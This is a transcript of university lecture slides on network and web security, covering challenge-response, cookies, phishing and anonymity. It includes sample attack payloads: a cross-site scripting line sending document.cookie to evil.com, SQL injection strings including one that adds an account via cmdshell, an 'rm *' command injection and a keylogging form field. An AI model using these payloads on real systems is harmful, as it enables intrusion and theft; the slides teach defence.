Copia di Sicurezza delle reti di comunicazione - uniroma2.it delle reti di... · Sicurezza delle...
Transcript of Copia di Sicurezza delle reti di comunicazione - uniroma2.it delle reti di... · Sicurezza delle...
Sicurezza delle Reti di Comunicazione - 2
Raccolta di lucidi
Franco Arcieri
Challenge-Response
user systemsecret key
challenge value
f(key,challenge)
Why is this better than a password over a network?
secret key
Challenge-Response Authentication
◆User and system share a secret key ◆Challenge: system presents user with some string ◆Response: user computes response based on
secret key and challenge • Secrecy: difficult to recover key from response
– One-way hashing or symmetric encryption work well
• Freshness: if challenge is fresh and unpredictable, attacker on the network cannot replay an old response
– For example, use a fresh random number for each challenge
◆Good for systems with pre-installed secret keys • Car keys; military friend-or-foe identification
MIG-in-the-Middle Attack [Ross Anderson]
AngolaNamibia
South African bomberCuban MIG
Challenge N
Secret key K
Secret key K
Retransmit challenge N
N
Response {N}K
{N}K{N}K
Response correct!
Authentication with Shared Secret
?
Alice and Bob share some secret. How can they identify each other on the network?
What have we learned from the systems we’ve seen?
Alice Bob
“kiwifruit”“kiwifruit”
Active attacker
not just eavesdrops, but inserts his own messages
Challenge-Response
Alice Bob
“kiwifruit”“kiwifruit”
Active attacker
Fresh, random RR
hash(“kiwifruit”,R) hash(“kiwifruit”,R)
◆ Man-in-the-middle attack on challenge-response • Attacker successfully authenticates as Alice by simple replay
◆This is an attack on authentication, not secrecy • Attacker does not learn the shared secret • However, response opens the door to offline dictionary attack
Encrypted Timestamp
Alice Bob
KEYKEY
EncryptKEY(time)
EncryptKEY(time)
◆Requires synchronized clocks • Bob’s clock must be secure, or else attacker will roll it back and
reuse an old authentication message from Alice
◆Attacker can replay within clock skew window
Replace with (n-1, x)
Lamport’s Hash
Alice Bob
n, y=hashn(“kiwifruit”)
x=hash(…(hash(“kiwifruit”))
“kiwifruit”
n
n-1 times
Verifies y=hash(x)?
◆ Main idea: “hash stalk” • Moving up the stalk (computing the next hash) is easy,
moving down the stalk (inverting the hash) is hard • n should be large (can only use it for n authentications)
◆ For verification, only need the tip of the stalk
hashm(“kiwifruit”)
“Small n” Attack
Alice Bob
n, y=hashn(“kiwifruit”)
◆ First message from Bob is not authenticated! ◆Alice should remember current value of n
“kiwifruit”
Real n
Verifies y=hash(x) Yes!
?Fake, small m
x=hashn-1(“kiwifruit”)
Easy to compute hashn-1(…) if know hashm(…) with m<n
Web Security
Browser and Network
Browser
NetworkOS
Hardware
websiterequest
reply
Microsoft Issues New IE Browser Security Patch By Richard Karpinski
• Microsoft has released a security patch that closes some major holes in its Internet Explorer browser
• The so-called "cumulative patch" fixes six different IE problems
• Affected browsers include Internet Explorer 5.01, 5.5 and 6.0
• Microsoft rated the potential security breaches as "critical"
February 12, 2002
Fixed by the February Patch
◆Buffer overrun associated with an HTML directive • Could be used by hackers to run malicious code on a
user's system ◆ Scripting vulnerability
• Lets an attacker read files on a user's system
◆Vulnerability related to the display of file names • Hackers could misrepresent the name of a file and trick
a user into downloading an unsafe file ◆… and many more
October 12
Microsoft Security Bulletin If a user is logged on with administrative privileges, an attacker who
successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full privileges. […] Microsoft recommends that customers install the update immediately.
Cascading Style Sheets (CSS) Heap Critical
Memory Corruption Vulnerability
Similar Method Name Redirection Critical Cross Domain Vulnerability
Install Engine Vulnerability Critical
SSL Caching Vulnerability Moderate
Aggregate Severity of All Vulnerabilities Critical
December 13
Microsoft Security Bulletin If a user is logged on with administrative user rights, an attacker who
successfully exploited the most severe of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. […] We recommend that customers apply the update immediately.
File Download Dialog Box Manipulation Vulnerability Moderate
HTTPS Proxy Vulnerability Moderate
COM Object Instantiation Memory Corruption Vulnerability Critical Mismatched Document Object Model Objects Critical
Memory Corruption Vulnerability
Aggregate Severity of All Vulnerabilities Critical
January 7
Microsoft Security Bulletin
A remote code execution vulnerability exists in the Vector Markup Language (VML) implementation in Microsoft Windows. An attacker could exploit the vulnerability by constructing a specially crafted Web page or HTML e-mail that could potentially allow remote code execution if a user visited the Web page or viewed the message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Maximum Severity Rating: Critical
Recommendation: Customers should apply the update immediately
Many Other Vulnerabilities
◆Check out http://www.microsoft.com/technet/security/
HTTP: HyperText Transfer Protocol
◆Used to request and return data • Methods: GET, POST, HEAD, …
◆ Stateless request/response protocol • Each request is independent of previous requests • Statelessness has a significant impact on design and
implementation of applications ◆ Evolution
• HTTP 1.0: simple • HTTP 1.1: more complex
GET /default.asp HTTP/1.0 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Connection: Keep-Alive If-Modified-Since: Sunday, 17-Apr-96 04:32:58 GMT
HTTP Request
Method File HTTP version Headers
Data – none for GETBlank line
HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML>
HTTP Response
HTTP version Status code Reason phrase Headers
Data
HTTP Digest Authentication
client serverRequest URL with GET or POST method
• HTTP 401 Unauthorised • Authentication “realm” (description of system being accessed)
• Fresh, random nonce
H1=hash(username, realm, password) H2=hash(method, URL) H3=hash(H1, server nonce, H2)
Recompute hashes and verify
Primitive Browser Session
www.e_buy.com
www.e_buy.com/ shopping.cfm?
pID=269
View catalog
www.e_buy.com/ shopping.cfm?
pID=269& item1=102030405
www.e_buy.com/ checkout.cfm?
pID=269& item1=102030405
Check outSelect item
Store session information in URL; easily read on network
FatBrain.com circa 1999 [due to Fu et al.]
◆User logs into website with his password, authenticator is generated, user is given special URL containing the authenticator
• With special URL, user doesn’t need to re-authenticate – Reasoning: user could not have not known the special URL
without authenticating first. That’s true, BUT…
◆Authenticators are global sequence numbers • It’s easy to guess sequence number for another user
• Fix: use random authenticators
https://www.fatbrain.com/HelpAccount.asp?t=0&[email protected]&p2=540555758
https://www.fatbrain.com/HelpAccount.asp?t=0&p1=SomeoneElse&p2=540555752
Bad Idea: Encoding State in URL
◆Unstable, frequently changing URLs ◆Vulnerable to eavesdropping ◆ There is no guarantee that URL is private
• Early versions of Opera used to send entire browsing history, including all visited URLs, to Google
Cookies
Storing Info Across Sessions
◆A cookie is a file created by an Internet site to store information on your computer
BrowserServer
Enters form data
Stores cookie
BrowserServer
Requests cookie
Returns data
HTTP is a stateless protocol; cookies add state
Includes domain (who can read it), expiration, “secure” (can be read only over SSL)
What Are Cookies Used For?
◆Authentication • Use the fact that the user authenticated correctly in
the past to make future authentication quicker ◆ Personalization
• Recognize the user from a previous visit
◆ Tracking • Follow the user from site to site; learn his/her
browsing behavior, preferences, and so on
Cookie Management
◆Cookie ownership • Once a cookie is saved on your computer, only the
website that created the cookie can read it ◆Variations
• Temporary cookies – Stored until you quit your browser
• Persistent cookies – Remain until deleted or expire
• Third-party cookies – Originates on or sent to another website
Privacy Issues with Cookies
◆Cookie may include any information about you known by the website that created it • Browsing activity, account information, etc.
◆ Sites can share this information • Advertising networks • 2o7.net tracking cookie
◆Browser attacks could invade your “privacy” November 8, 2001: Users of Microsoft's browser and e-mail programs could
be vulnerable to having their browser cookies stolen or modified due to a new security bug in Internet Explorer (IE), the company warned today
Austin American-Statesman
The website “adinterax.com” has requested to save a file on your computer called a “cookie.” This file may be used to track usage information…
The Weather Channel
The website “twci.coremetrics.com” has requested to save a file on your computer called a “cookie.” This file may be used to track usage information…
MySpace
The website “insightexpressai.com” has requested to save a file on your computer called a “cookie”…
Let’s Take a Closer Look…
Storing State in Browser
<FORM METHOD=POST ACTION=“http://.../cgi-bin/scripts/cart.pl”>
Black Leather purse with leather straps<BR>Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
Change this to 2.00
Bargain shopping!
Shopping Cart Form Tampering◆ Many Web-based shopping cart applications use hidden fields in HTML forms
to hold parameters for items in an online store. These parameters can include the item's name, weight, quantity, product ID, and price. Any application that bases price on a hidden field in an HTML form is vulnerable to price changing by a remote user. A remote user can change the price of a particular item they intend to buy, by changing the value for the hidden HTML tag that specifies the price, to purchase products at any price they choose.
Storing State in Browser Cookies
◆ Set-cookie: price=299.99 ◆User edits the cookie… cookie: price=29.99 ◆What’s the solution? ◆Add a MAC to every cookie, computed with the
server’s secret key • Price=299.99; HMAC(ServerKey, 299.99)
◆But what if the website changes the price?
Web Authentication via Cookies
◆Need authentication system that works over HTTP and does not require servers to store session data • Why is it a bad idea to store session state on server?
◆ Servers can use cookies to store state on client • When session starts, server computes an authenticator
and gives it back to browser in the form of a cookie – Authenticator is a value that client cannot forge on his own – Example: hash(server’s secret key, session id)
• With each request, browser presents the cookie • Server recomputes and verifies the authenticator
– Server does not need to remember the authenticator
Typical Session with Cookies
client server
POST /login.cgi
Set-Cookie:authenticator
GET /restricted.html Cookie:authenticator
Restricted content
Verify that this client is authorized
Check validity of authenticator (e.g., recompute hash(key,sessId))
Authenticators must be unforgeable and tamper-proof (malicious client shouldn’t be able to compute his own or modify an existing
authenticator)
WSJ.com circa 1999 [due to Fu et al.]
◆ Idea: use user,hash(user,key) as authenticator • Key is secret and known only to the server. Without
the key, clients can’t forge authenticators. ◆ Implementation: user,crypt(user,key)
• crypt() is UNIX hash function for passwords • crypt() truncates its input at 8 characters • Usernames matching first 8 characters end up with the
same authenticator • No expiration or revocation
◆ It gets worse… This scheme can be exploited to extract the server’s secret key
Attack
username crypt(username,key,“00”) authenticator cookie
VitalySh1VitalySh2
008H8LRfzUXvk VitalySh1008H8LRfzUXvk008H8LRfzUXvk VitalySh2008H8LRfzUXvk
Create an account with a 7-letter user name…VitalySA 0073UYEre5rBQ Try logging in: access refused
VitalySB 00bkHcfOXBKno Access refusedVitalySC 00ofSJV6An1QE Login successful! 1st key symbol is C
Now a 6-letter user name…VitalyCA
VitalyCB
001mBnBErXRuc
00T3JLLfuspdo
Access refused
Access refused… and so on
• Only need 128 x 8 queries instead of intended 1288
• 17 minutes with a simple Perl script vs. 2 billion years
Better Cookie Authenticator
Capability Expiration Hash(server secret, capability, expiration)
Describes what user is authorized to do on the site that issued the cookie
Cannot be forged by malicious user; does not leak server secret
◆Main lesson: don’t roll your own! • Homebrewed authentication schemes are often flawed
◆ There are standard cookie-based schemes • We’ll see one when discussing IPSec
◆Online banking, shopping, government, etc. etc. ◆Website takes input from user, interacts with
back-end databases and third parties, outputs results by generating an HTML page
◆Often written from scratch in a mixture of PHP, Java, Perl, Python, C, ASP
◆ Security is rarely the main concern • Poorly written scripts with inadequate input validation • Sensitive data stored in world-readable files • Recent push from Visa and Mastercard to improve
security of data management (PCI standard)
Web Applications
JavaScript
◆ Language executed by browser • Can run before HTML is loaded, before page is viewed,
while it is being viewed or when leaving the page ◆Often used to exploit other vulnerabilities
• Attacker gets to execute some code on user’s machine • Cross-scripting: attacker inserts malicious JavaScript
into a Web page or HTML email; when script is executed, it steals user’s cookies and hands them over to attacker’s site
Scripting
<script type="text/javascript"> function whichButton(event) { if (event.button==1) { alert("You clicked the left mouse button!") } else { alert("You clicked the right mouse button!") }} </script> … <body onMouseDown="whichButton(event)"> … </body>
Script defines a page-specific function
Function gets executed when some event happens (onLoad, onKeyPress, onMouseMove…)
JavaScript Security Model
◆ Script runs in a “sandbox” • Not allowed to access files or talk to the network
◆ Same-origin policy • Can only read properties of documents and windows
from the same server, protocol, and port • If the same server hosts unrelated sites, scripts from
one site can access document properties on the other ◆User can grant privileges to signed scripts
• UniversalBrowserRead/Write, UniversalFileRead, UniversalSendMail
Risks of Poorly Written Scripts
◆ For example, echo user’s input
http://naive.com/search.php?term=“Britney Spears”
search.php responds with
<html> <title>Search results</title>
<body>You have searched for <?php echo $_GET[term] ?>… </body>
Or
GET/ hello.cgi?name=Bob
hello.cgi responds with <html>Welcome, dear Bob</html>
Stealing Cookies by Cross Scripting
victim’s browser
naive.com
evil.com
Access some web page
<FRAME SRC= http://naive.com/hello.cgi? name=<script>win.open( “http://evil.com/steal.cgi? cookie=”+document.cookie) </script>>
Forces victim’s browser to call hello.cgi on naive.com with script instead of name
GET/ hello.cgi?name= <script>win.open(“http:// evil.com/steal.cgi?cookie”+ document.cookie)</script>
hello.cgi executed
<HTML>Hello, dear <script>win.open(“http:// evil.com/steal.cgi?cookie=” +document.cookie)</script> Welcome!</HTML>
Interpreted as Javascript by victim’s browser; opens window and calls steal.cgi on evil.com
GET/ steal.cgi?cookie=
For example, embed URL in HTML email
◆Users can post HTML on their MySpace pages ◆MySpace does not allow scripts in users’ HTML
• No <script>, <body>, onclick, <a href=javascript://> ◆… but does allow <div> tags for CSS. K00L!
• <div style=“background:url(‘javascript:alert(1)’)”> ◆But MySpace will strip out “javascript”
• Use “java<NEWLINE>script” instead ◆But MySpace will strip out quotes
• Convert from decimal instead: alert('double quote: ' + String.fromCharCode(34))
MySpace Worm (1)http://namb.la/popular/tech.html
◆ “There were a few other complications and things to get around. This was not by any means a straight forward process, and none of this was meant to cause any damage or piss anyone off. This was in the interest of..interest. It was interesting and fun!”
◆ Started on “samy” MySpace page ◆ Everybody who visits an infected page, becomes infected
and adds “samy” as a friend and hero ◆ 5 hours later “samy” has 1,005,831 friends
• Was adding 1,000 friends per second at its peak
MySpace Worm (2)http://namb.la/popular/tech.html
◆Need to prevent injection of scripts into HTML. This is difficult!
◆ Preprocess any input from user before using it inside HTML • In PHP, htmlspecialchars(string) will replace all special
characters with their HTML codes – ‘ becomes ' – “ becomes " – & becomes &
• In ASP.NET, Server.HtmlEncode(string)
Preventing Cross-Site Scripting
Inadequate Input Validation
◆ http://victim.com/copy.php?name=username ◆ copy.php includes system(“cp temp.dat $name.dat”) ◆User calls http://victim.com/copy.php?name=“a; rm *” ◆ copy.php executes system(“cp temp.dat a; rm *”);
Supplied by the user!
URL Redirection
◆ http://victim.com/cgi-bin/loadpage.cgi?page=url • Redirects browser to url • Commonly used for tracking user clicks; referrals
◆ Phishing website puts http://victim.com/ cgi-bin/loadpage.cgi?page=phish.com ◆ Everything looks Ok (the link is indeed pointing to
victim.com), but user ends up on phishing site!
User Data in SQL Queries
◆ set UserFound=execute( SELECT * FROM UserTable WHERE username=′ ” & form(“user”) & “ ′ AND password=′ ” & form(“pwd”) & “ ′ ” );
• User supplies username and password, this SQL query checks if user/password combination is in the database
◆ If not UserFound.EOF Authentication correct else Fail
Only true if the result of SQL query is not empty, i.e., user/pwd is in the database
SQL Injection
◆User gives username ′ OR 1=1 -- ◆Web server executes query set UserFound=execute( SELECT * FROM UserTable WHERE username=′ ′ OR 1=1 -- … );
◆ This returns the entire database! ◆UserFound.EOF is always false; authentication is
always “correct”
Always true!
Everything after -- is ignored!
It Gets Better
◆User gives username ′ exec cmdshell ’net user badguy badpwd’ / ADD --
◆Web server executes query set UserFound=execute( SELECT * FROM UserTable WHERE username=′ ′ exec … -- … ); ◆Creates an account for badguy on DB server ◆ Fix: always escape user-supplied arguments
• Convert ’ into \’
Uninitialized Inputs
/* php-files/lostpassword.php */ for ($i=0; $i<=7; $i++) $new_pass .= chr(rand(97,122)) … $result = dbquery(“UPDATE ”.$db_prefix.“users SET user_password=md5(‘$new_pass’) WHERE user_id=‘”.$data[‘user_id’].“ ’ ”);
In normal execution, this becomes UPDATE users SET user_password=md5(‘???????’) WHERE user_id=‘userid’
Creates a password with 7 random characters, assuming $new_pass is set to NULL
SQL query setting password in the DB
… with superuser privileges
User’s password is set to ‘badPwd’
Exploit
User appends this to the URL: &new_pass=badPwd%27%29%2c user_level=%27103%27%2cuser_aim=%28%27
SQL query becomes UPDATE users SET user_password=md5(‘badPwd’) user_level=‘103’, user_aim=(‘???????’) WHERE user_id=‘userid’
This sets $new_pass to badPwd’), user_level=‘103’, user_aim=(‘
The Longhorns sacked Leinart three times…
SQL Injection in the Real World
◆ “A programming error in the University of Southern California's online system for accepting applications from prospective students left the personal information of as many as 280,000 users publicly accessible… The vulnerability in USC's online Web application system is a relatively common and well-known software bug, known as database injection or SQL injection”
– SecurityFocus, July 6, 2005
ActiveX
◆ActiveX controls are downloaded and installed • Compiled binaries for client’s OS
◆ActiveX controls reside on client's machine • Activated by HTML object tag on the page • Run as binaries, not interpreted by browser
◆ Security model relies on three components • Digital signatures to verify the source of the binary • Browser policy can reject controls from network zones • Controls can be marked by author as “safe for
initialization” or “safe for scripting”
Once accepted, installed and started, no control over execution!
Installing Controls
If you install and run, no further control over the code In principle, browser/OS could apply sandboxing, other
techniques for containing risks in native code
ActiveX Risks
◆ From MSDN: • “An ActiveX control can be an extremely insecure way to provide a
feature. Because it is a Component Object Model (COM) object, it can do anything the user can do from that computer. It can read from and write to the registry, and it has access to the local file system. From the moment a user downloads an ActiveX control, the control may be vulnerable to attack because any Web application on the Internet can repurpose it, that is, use the control for its own ends whether sincere or malicious.”
◆How can a control be “repurposed?” • Once installed, control can be accessed by any page that knows its
class identifier (CLSID)
IE Browser “Helper Objects”
◆COM components loaded when IE starts up ◆Run in same memory context as the browser ◆ Perform any action on IE windows and modules
• Detect browser events – GoBack, GoForward, and DocumentComplete
• Access browser menu, toolbar and make changes • Create windows to display information (or ads!!) • Install hooks to monitor messages and actions
◆ There is no protection from extensions • Spyware writers’ favorite! • Try running HijackThis on your computer
Dangerous Websites
◆Recent “Web patrol” study at Microsoft identified 752 unique URLs that could successfully exploit unpatched Windows XP machines • Many are interlinked by redirection and controlled by
the same major players ◆ “But I never visit risky websites”
• 11 exploit pages are among the top 10,000 most visited • Common trick: put up a page with popular content, get
into search engines, page redirects to the exploit site – One of the malicious sites was providing exploits to 75
“innocuous” sites focusing on (1) celebrities, (2) song lyrics, (3) wallpapers, (4) video game cheats, and (5) wrestling
Attacks on Browser Privacy
◆ “Same-origin” principle • Only the site that stores some information in the
browser may later read or modify that information ◆Not fully enforced in today’s browsers
• Firefox checks third-party cookie policy only when the cookie is read, not when the cookie is set
– Any site can set a third-party cookie
◆Cache tracking and timing attacks • Measure time it takes to load a page
– If fast, user must have visited it recently (still in the cache)
• Measure time it takes to do a DNS lookup
Phishing andOnline Identity Management
A Few Headlines
◆ “11.9 million Americans clicked on a phishing e-mail in 2005”
◆ “Gartner estimates that the total financial losses attributable to phishing will total $2.8 bln in 2006”
◆ “Phishing and key-logging Trojans cost UK banks £12m”
◆ “Swedish bank hit by 'biggest ever' online heist” “Swedish Bank loses $1 Million through Russian
hacker”
MillerSmiles.co.uk
A Snapshot of My Mailbox
Typical Phishing Page
• Weird URL • http instead of https
Or Even Like This
A Closer Look
From: “Wells Fargo” <[email protected]>
<a target=“_blank” href=“http://www.members.axion.net/~rod/.Wells.Fargo.com” > https://online.wellsfargo.com/signon?LOB=CONS</a>
What you’ll see on the page Where the link actually goes
And You End Up Here
2006 (must be an old snapshot)
Thank Goodness for IE 7.0 J
Phishing Techniques
◆Use confusing URLs • http://gadula.net/.Wells.Fargo.com/signin.html
◆Use URL with multiple redirection • http://www.chase.com/url.php?url=“http://phish.com”
◆Host phishing sites on botnet zombies • Move from bot to bot using dynamic DNS
◆ Pharming • Poison DNS tables so that victim’s address (e.g.,
www.paypal.com) points to the phishing site • URL checking doesn’t help!
Bad Idea: Echoing User Input
◆User input echoed in HTTP header ◆ For example, language redirect: <% response.redirect(“/by_lang.jsp?lang=” +
request.getParameter(“lang”) ) %> ◆Browser sends http://.../by_lang.jsp ? lang=french ◆ Server responds HTTP/1.1 302 Date: … Location: /by_lang.jsp ? lang=french
redirectto here
◆Malicious user requests
◆ Server responds:
HTTP Response Splitting
http://.../by_lang.jsp ? lang=
“french \n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK <Encoded URL of phishing page>”
HTTP/1.1 302
Date: …
` Location: /by_lang.jsp ? lang= french
Content-length: 0
HTTP/1.1 200 OK
Content-length: 217
Phishing page
Looks like a separate page
Why?
◆Attacker submitted a URL to victim.com ◆Response from victim.com contains phishing page ◆All cache servers along the path will store the
phishing page as the cache of victim.com ◆ If an unsuspecting user of the same cache server
requests victim.com, server will give him the cached phishing page instead
Trusted Input Path Problem
◆Users are easily tricked into entering passwords into insecure non-password fields <input type="text" name="spoof" onKeyPress="(new Image()).src=
’keylogger.php?key=’ + String.fromCharCode( event.keyCode ); event.keyCode = 183;” >
Sends keystroke to phisher
Changes character to *
Social Engineering Tricks
◆Create a bank page advertising an interest rate slightly higher than any real bank; ask users for their credentials to initiate money transfer • Some victims provided their bank account numbers to
“Flintstone National Bank” of “Bedrock, Colorado” ◆ Exploit social network
• Spoof an email from a Facebook or MySpace friend – Read Jan 29 WSJ article about MySpace hack (course website)
• In a West Point experiment, 80% of cadets were deceived into following an embedded link regarding their grade report from a fictitious colonel
Experiments at Indiana University
◆Reconstructed the social network by crawling sites like Facebook, MySpace, LinkedIn and Friendster
◆ Sent 921 Indiana University students a spoofed email that appeared to come from their friend
◆ Email redirected to a spoofed site inviting the user to enter his/her secure university credentials • Domain name clearly distinct from indiana.edu
◆ 72% of students entered their real credentials into the spoofed site • Males more likely to do this if email is from a female
[Jagatic et al.]
Seven Stages of Grief
[according to Elizabeth Kübler-Ross]
• Shock or disbelief • Denial • Bargaining • Guilt • Anger • Depression • Acceptance
Victims’ Reactions (1)
◆Anger • Subjects called the experiment unethical, inappropriate,
illegal, unprofessional, fraudulent, self-serving, useless • They called for the researchers conducting the study to
be fired, prosecuted, expelled, or reprimanded ◆Denial
• No posted comments included an admission that the writer had fallen victim to the attack
• Many posts stated that the poster did not and would never fall for such an attack, and they were speaking on behalf of friends who had been phished
[Jagatic et al.]
Victims’ Reactions (2)
◆Misunderstanding • Many subjects were convinced that the experimenters
hacked into their email accounts. They believed it was the only possible explanation for the spoofed messages.
◆Underestimation of privacy risks • Many subjects didn’t understand how the researchers
obtained information about their friends, and assumed that the researchers accessed their address books
• Others, understanding that the information was mined from social network sites, objected that their privacy had been violated by the researchers who accessed the information that they had posted online
[Jagatic et al.]
Defense #1
◆ “White list” of trusted sites ◆Other URLs sent to Microsoft, who responds with
“Ok” or “Phishing!”
Defense #2: PassMark / SiteKey
If you don’t recognize your personalized SiteKey, don’t enter your Passcode
Defense #3: PIN Guard
Use your mouse to click the number, or use your keyboard to type the letters
Defense #3A: Scramble Pad
Enter access code by typing letters from randomly generated Scramble Pad
Defense #4: Virtual Keyboard
Use your mouse to select characters from the virtual keyboard
Defense #5: Bharosa Slider
On first login, user picks a symbol. On subsequent logins all letters and numbers in the PIN must be chosen using correct symbol.
PwdHash [Stanford project]
◆Generate a unique password per site • HMACfido:123(banka.com) ⇒ Q7a+0ekEXb
• HMACfido:123(siteb.com) ⇒ OzX2+ICiqc
◆Hashed password is not usable at any other site
Bank A
hash(pwdB, SiteB)
hash(pwdA, BankA)
Site B
pwdA
pwdB
=
How PwdHash Works
◆ Install the free plug-in ◆Activate it by adding @@ before the password ◆Can also go to a remote site (www.pwdhash.com)
which will generate password for you ◆ From then on, user doesn’t know the “real”
password; instead, PwdHash automatically produces site-specific passwords • If user types password at a phishing site, the site’s
address will be used as the password “salt” • Resulting password is unusable at the real site
Usability Study at Carleton U.
◆ 27 students (none in computer security) ◆ 73% use online banking and bill payments ◆ 96% reuse passwords on different sites ◆ 69% choose passwords so that they are easy to
remember ◆ 85% at least somewhat concerned about the
security of passwords ◆All fairly comfortable with using computers
[Chiasson, van Oorschot, Biddle]
◆Users were given several simple tasks • Log in with a protected password for the first time • Switch from an unprotected to protected password • Log in from a computer that doesn’t have the plug-in • Update protected password • Log in with a protected password for the second time
◆ These had to be performed on popular sites such as Hotmail, Google, Amazon, and Blogger
Typical Password Activities
◆Only one task had a success rate above 50% (log in with protected password for the 2nd time)
• Update protected password: 19%; remote login: 27% ◆Many users felt they had successfully completed
the task when in reality they had not • For example, mistakenly thought they switched to a
protected password and then logged in with it (in reality, were logging in with unprotected password)
◆Many successes were due to participants trying random actions until eventually something worked
Results
◆When updating password, fail to realize that need to type @@ in front of the password when re-typing it for reconfirmation
◆ For remote login, must first go to a site that hashes passwords using domain name as “salt”…
◆ Typical questions from users: • “How will it know to generate my password?” • “How does it know who I am?” • “Wait, it’s going to give anyone who enters my regular
password the same complicated password? Not good!”
What Users Think
◆Of those who failed to log in remotely (31%), most never even reached the remote web site
◆Although told explicitly that “you are now at your friend’s house, they don’t have the software installed”, they still tried to log in using @@
◆With half a page of instructions directly in front of them, they tended not to refer to it • Half entered their passwords with @@, half without
◆Only one user read instructions on remote site
More Remote Login Troubles
Best User Quote
“Really, I don’t see how my password is safer because of two @’s in front”
BOFH Syndrome
Don’t blame users, blame poor usability!
Microsoft Passport
User
◆ Idea: authenticate once, use everywhere ◆Trusted third party issues identity credentials, user uses them
to access services all over the Web
Sign on once
Receive Web identity
Access any network service
Stores credit card numbers, personal information
.NET Passport
EmailMessenger
Web retailers
Identity Management with Passport
Website.NET Passport
�Log in�Redirect browser to Passport server
�Email and password?
�[email protected], “kiwifruit”
Passport user database
�Check user against database
�3 encrypted cookies�Redirect browser back to website
Passport manager
�Decrypt & verify cookies�Requested page
User
Passport: Early Glitches
◆ Flawed password reset procedure • Password reset didn’t require previous password • Attacker sends modified URL requesting reset, receives
email from Passport providing URL to change password – http://register.passport.net/emailpwdreset.srf?
lc=1033&[email protected]&id=&cb=&[email protected]
◆Cross-scripting attack • Victim stores credit card info in Microsoft Wallet
– Information kept in a cookie for 15 minutes
• Victim then logs into Hotmail & reads attacker’s email – Malicious email contains HTML. Hotmail’s web interface
processes it, calls script on another site and hands over cookie.
History of Passport
◆ Launched in 1999 • By 2002, Microsoft claimed over 200 million accounts,
3.5 billion authentications each month ◆Current status
• https://technet.microsoft.com/it-it/library/dn985839(v=vs.85).aspx
Liberty Alliance
◆Open-standard alternative to Passport
◆ Promises compliance with privacy legislation ◆ Long list of Liberty-enabled products
• See website
http://www.projectliberty.org
Anonymity on the Internet
Privacy on Public Networks
◆ Internet is designed as a public network • Machines on your LAN may see your traffic, network
routers see all traffic that passes through them ◆Routing information is public
• IP packet headers identify source and destination • Even a passive observer can easily figure out who is
talking to whom ◆ Encryption does not hide identities
• Encryption hides payload, but not routing information • Even IP-level encryption (tunnel-mode IPSec/ESP)
reveals IP addresses of IPSec gateways
Applications of Anonymity (I)
◆ Privacy • Hide online transactions, Web browsing, etc. from
intrusive governments, marketers and archivists ◆Untraceable electronic mail
• Corporate whistle-blowers • Political dissidents • Socially sensitive communications (online AA meeting) • Confidential business negotiations
◆ Law enforcement and intelligence • Sting operations and honeypots • Secret communications on a public network
Applications of Anonymity (II)
◆Digital cash • Electronic currency with properties of paper money
(online purchases unlinkable to buyer’s identity) ◆Anonymous electronic voting ◆Censorship-resistant publishing ◆Crypto-anarchy
• “Some people say `anarchy won't work’. That's not an argument against anarchy; that's an argument against work.” – Bob Black
What is Anonymity?
◆Anonymity is the state of being not identifiable within a set of subjects • You cannot be anonymous by yourself!
– Big difference between anonymity and confidentiality
• Hide your activities among others’ similar activities
◆Unlinkability of action and identity • For example, sender and his email are no more related
after observing communication than they were before ◆Unobservability (hard to achieve)
• Any item of interest (message, event, action) is indistinguishable from any other item of interest
Attacks on Anonymity
◆ Passive traffic analysis • Infer from network traffic who is talking to whom • To hide your traffic, must carry other people’s traffic!
◆Active traffic analysis • Inject packets or put a timing signature on packet flow
◆Compromise of network nodes • Attacker may compromise some routers • It is not obvious which nodes have been compromised
– Attacker may be passively logging traffic
• Better not to trust any individual router – Assume that some fraction of routers is good, don’t know which
Chaum’s Mix
◆ Early proposal for anonymous email • David Chaum. “Untraceable electronic mail, return
addresses, and digital pseudonyms”. Communications of the ACM, February 1981.
◆ Public key crypto + trusted re-mailer (Mix) • Untrusted communication medium • Public keys used as persistent pseudonyms
◆Modern anonymity systems use Mix as the basic building block
Before spam, people thought anonymous email was a good idea J